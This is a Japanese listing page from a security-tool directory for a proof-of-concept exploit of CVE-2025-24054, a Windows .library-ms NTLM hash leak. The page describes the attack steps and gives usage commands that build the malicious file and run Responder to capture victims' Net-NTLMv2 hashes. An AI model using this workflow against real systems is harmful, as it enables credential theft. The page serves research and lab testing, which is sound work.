Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24054-PoC — CVE-2025-24054の概念実証エクスプロイト。Windowsライブラリ(.library-ms)のNTLMハッシュ開示脆弱性。ZIPアーカイブから抽出されたときに、SMBを介してNet-NTLMv2ハッシュを漏洩させる悪意のある.library-msファイルを生成します。 | Kitploit
ツール/GitHubGitHub/simantchaudhari/cve-2025-24054-poc
パスワードクラッキング脆弱性分析エクスプロイト情報収集学習と教育ラボと実践
GitHubsimantchaudhari/cve-2025-24054-poc

CVE-2025-24054-PoC

CVE-2025-24054の概念実証エクスプロイト。Windowsライブラリ(.library-ms)のNTLMハッシュ開示脆弱性。ZIPアーカイブから抽出されたときに、SMBを介してNet-NTLMv2ハッシュを漏洩させる悪意のある.library-msファイルを生成します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
34ヶ月前未レビュー

CVE-2025-24054 PoC

CVE-2025-24054 – Windows ライブラリ(.library-ms)NTLM ハッシュ漏えいの脆弱性に関するシンプルな概念実証(PoC)です。

⚠️ 教育目的および許可されたラボ環境でのみ使用してください


説明

CVE-2025-24054 は、特別に細工された .library-ms ファイルを使用することで、攻撃者に Windows システム上の被害者の Net-NTLMv2 ハッシュ を漏えいさせることができる脆弱性です。

被害者が悪意のある .library-ms ファイルを含む ZIP を展開すると、Windows Explorer が自動的に SMB 接続を開始し、NTLM ハッシュを漏えいさせます。

仕組み

  1. 攻撃者は、自身のマシンを指す UNC パスを含む悪意のある .library-ms ファイルを生成します。
  2. このファイルは ZIP アーカイブ内に含めて配布されます。
  3. 被害者が ZIP ファイルを展開します。
  4. Windows Explorer が自動的にライブラリの読み込みを試み、NTLM 認証要求が発生します。
  5. 攻撃者は Responder を使用して Net-NTLMv2 ハッシュをキャプチャします。

alt text

1. 使用方法

python poc.py -i YOUR-IP

2. Responder の起動(攻撃者マシン)

sudo responder -I eth0

ツールをダウンロード